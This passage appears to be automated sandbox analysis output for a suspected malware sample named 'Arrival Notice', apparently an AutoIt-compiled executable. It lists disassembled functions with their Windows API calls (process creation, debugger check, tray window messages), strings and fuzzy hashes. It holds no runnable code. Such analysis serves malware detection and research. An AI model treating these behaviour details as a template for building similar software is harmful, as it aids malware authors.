                  • Opcode Fuzzy Hash: 79a77e4620d045983f21e34b03e388d555dc2fefc9130e4c49d343e8f5c9a6cd
                  • Instruction Fuzzy Hash: AA01DB7568111867CF05EB90CA41BFF77A89B11344F240017BA0677291FA689F48D6F9
                  Function 003CA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003CA529
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer_wcslen
                  • String ID: ,%H$3y@
                  • API String ID: 2551934079-735046420
                  • Opcode ID: 123ee6a10c21707b8906225ed410a8cc8bd4c9043b253026ae0f0bc1386244f8
                  • Instruction ID: aafae29a9131d8ca8675abe7b58fc94f555ead172b9f979c44132651822e533d
                  • Opcode Fuzzy Hash: 123ee6a10c21707b8906225ed410a8cc8bd4c9043b253026ae0f0bc1386244f8
                  • Instruction Fuzzy Hash: 1401F732640A1897C507F768AC57FAD3358DB06B14F50446EF6019F2C2DE509D01879B
                  Function 00411D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 00413CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00413CCA
                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00411DD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ClassMessageNameSend_wcslen
                  • String ID: ComboBox$ListBox
                  • API String ID: 624084870-1403004172
                  • Opcode ID: 5b1148d03205801986f291c06c7022461bcf700a57415cbd761bc37c0a5c8030
                  • Instruction ID: 29608d26b2bdef82a4c74a5e507dcf2389e504a09847796802cd1480deccbf0b
                  • Opcode Fuzzy Hash: 5b1148d03205801986f291c06c7022461bcf700a57415cbd761bc37c0a5c8030
                  • Instruction Fuzzy Hash: 9EF02D71B4121867CB04F7A4DC91FFF7778AB01344F14091BBA26672D1EA6469088268
                  Function 00448172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00483018,0048305C), ref: 004481BF
                  • CloseHandle.KERNEL32 ref: 004481D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: \0H
                  • API String ID: 3712363035-1034350999
                  • Opcode ID: 904382f13c56daca313a247851ab1b68141e2300adb02817d8d147c7e76b50d0
                  • Instruction ID: 9a672b22595eddfc91be2e4f0fb03457b9f14e098a22a7480543871fefe49d1b
                  • Opcode Fuzzy Hash: 904382f13c56daca313a247851ab1b68141e2300adb02817d8d147c7e76b50d0
                  • Instruction Fuzzy Hash: 9FF054B5640300BAE3206F61AC45F7F3A5CDB06B56F004836BB08D91A2D6799E0093BD
                  Function 0043747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: 3, 3, 16, 1
                  • API String ID: 176396367-3042988571
                  • Opcode ID: 83d35535e2e45dbef22a31a21786eae451c41a0a1d4fc3fb3cd92c4cd87734fc
                  • Instruction ID: a5ed440a3f8e0cbee1528c81f823cb28de8840acc8a1a2cd56b20450ce0719be
                  • Opcode Fuzzy Hash: 83d35535e2e45dbef22a31a21786eae451c41a0a1d4fc3fb3cd92c4cd87734fc
                  • Instruction Fuzzy Hash: 87E02B43204320219232137BACC1A7F5689CFDD790B10282BF9C5C6366EBB89D9193A4
                  Function 00410B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                  Download Yara Rule
                  APIs
                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00410B23
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message
                  • String ID: AutoIt$Error allocating memory.
                  • API String ID: 2030045667-4017498283
                  • Opcode ID: d69e34e1dc076c78156659cb7a2730191a6597ae3223c430c1708d289df40a6e
                  • Instruction ID: f48371f47be764a1c16dd011e142fc170e323bcafe3e94d68e3df1d96d2f036b
                  • Opcode Fuzzy Hash: d69e34e1dc076c78156659cb7a2730191a6597ae3223c430c1708d289df40a6e
                  • Instruction Fuzzy Hash: 05E0D8322853183BD21137947C43FC97B848F05B10F24442BF7489D5C38EE6689006ED
                  Function 003D0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003CF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,003D0D71,?,?,?,003B100A), ref: 003CF7CE
                  • IsDebuggerPresent.KERNEL32(?,?,?,003B100A), ref: 003D0D75
                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003B100A), ref: 003D0D84
                  Strings
                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003D0D7F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                  • API String ID: 55579361-631824599
                  • Opcode ID: 57acffd49a304a807f6da15993ffa26e02993df0ea5e005aea199baff91a72a1
                  • Instruction ID: a8bcacf5be89ace2d412ba3750f9a9f48c0d341fac7162e5bc664dbd80f19a27
                  • Opcode Fuzzy Hash: 57acffd49a304a807f6da15993ffa26e02993df0ea5e005aea199baff91a72a1
                  • Instruction Fuzzy Hash: 26E06DB42003018BE3659FB8E4447467BE5BB04B45F04897FE486C6761DBF4E4488BA5
                  Function 003CE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  • __Init_thread_footer.LIBCMT ref: 003CE3D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Init_thread_footer
                  • String ID: 0%H$8%H
                  • API String ID: 1385522511-2670815269
                  • Opcode ID: 2d119b7a68efc28c05740381e38745bb99576250a7a8a66e29b981b3d7b7d496
                  • Instruction ID: 6200eec2ea60da9b3caf180ef2572f9e84ecf178cbe20876d67c185177dc2374
                  • Opcode Fuzzy Hash: 2d119b7a68efc28c05740381e38745bb99576250a7a8a66e29b981b3d7b7d496
                  • Instruction Fuzzy Hash: E9E02036490950DBC607A79CB65CF4D3395EB06720B90097EE001CB5D19BB43C41874C
                  Function 0040D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LocalTime
                  • String ID: %.3d$X64
                  • API String ID: 481472006-1077770165
                  • Opcode ID: 3d9b9175abe794d7fdacf1c35b3754867c3f95ad9b2e8ab918e308cd545bd89b
                  • Instruction ID: 13ee48744e25b1f4f376efa4f073612c3718fad9bd1af980978c30708c423fa6
                  • Opcode Fuzzy Hash: 3d9b9175abe794d7fdacf1c35b3754867c3f95ad9b2e8ab918e308cd545bd89b
                  • Instruction Fuzzy Hash: 2CD01261C09118EACB9097D0DC45DB9B37CBB08301F6084BBF80AF1080D73CD90DAB6A
                  Function 00442356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                  Download Yara Rule
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044236C
                  • PostMessageW.USER32(00000000), ref: 00442373
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: 38bccba3f040fa15498115882c12fee801bf2c41e08d014d07cebf44f702a51f
                  • Instruction ID: fdd2aec03b9d8036edd68a0697b30ea88d2798e40d0af0539595d5abada08a85
                  • Opcode Fuzzy Hash: 38bccba3f040fa15498115882c12fee801bf2c41e08d014d07cebf44f702a51f
                  • Instruction Fuzzy Hash: B9D0A97A382310BAE2A8A3329C4FFCA66149B01B00F0189267706AA0D0C8B4A8008A0C
                  Function 00442322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                  Download Yara Rule
                  APIs
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044232C
                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044233F
                    • Part of subcall function 0041E97B: Sleep.KERNEL32 ref: 0041E9F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FindMessagePostSleepWindow
                  • String ID: Shell_TrayWnd
                  • API String ID: 529655941-2988720461
                  • Opcode ID: ed571a6f868414b470a07ced33773ae46b2b00104a7a4fa7a6217c14eb79d873
                  • Instruction ID: 8257f545577a0905358945cbbc2e60f57d85569a9fb73039028efe1849a8948d
                  • Opcode Fuzzy Hash: ed571a6f868414b470a07ced33773ae46b2b00104a7a4fa7a6217c14eb79d873
                  • Instruction Fuzzy Hash: 02D0227A391310B7E2A8B332DC4FFCA7A149B00B00F018927770AAA0D0C8F4A800CA0C